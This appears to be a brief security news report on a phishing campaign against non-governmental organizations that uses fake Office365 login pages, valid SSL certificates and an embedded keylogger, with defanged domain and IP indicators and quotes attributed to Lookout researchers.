A new wave of a sophisticated mobile-aware phishing campaign uncovered in wide that mainly targeting non-governmental organizations in various countries around the world.
The campaign is still live since March 2019, and the cybercriminals behind this attacker have been hosted two domains (session-services[.]com and service-ssl-check[.]com) with phishing content.
The Phishing domains are resolving two different IP addresses ( 111 [.] 90 [.] 142 [.] 105 and 111[.]90 [.] 142 [.] 91) in the same network, and these are had suspicious activities records in the past and very low reputation in the past, also used for hosting malware.
Key-logging and Fake Office365 login pages
The mobile-aware phishing campaign using various methods such as fake Office365 login page, abusing the valid SSL certificate, log keystrokes.
“Mobile web browsers also unintentionally help obfuscate phishing URLs by truncating them, making it harder for the victims to discover the deception.”
The researcher found some strong evidence of keylogging functionality embedded in the password field of the phishing login pages.
According to Lockout research “Attackers cleverly embedded the keylogger that even works if the target doesn’t complete the login activity by pressing the login button or if they enter another, unintended password, this information is still sent back to the command and control infrastructure operated by the malicious actor.”
This Phishing attack using valid SSL certificates and the attackers using several noteworthy techniques employed in this campaign.
“The mobile-aware component found in this campaign is further proof that phishing attacks have evolved to target mobile devices. Mobile phishing has emerged as a source of increased risk for enterprises”, lookout concluded.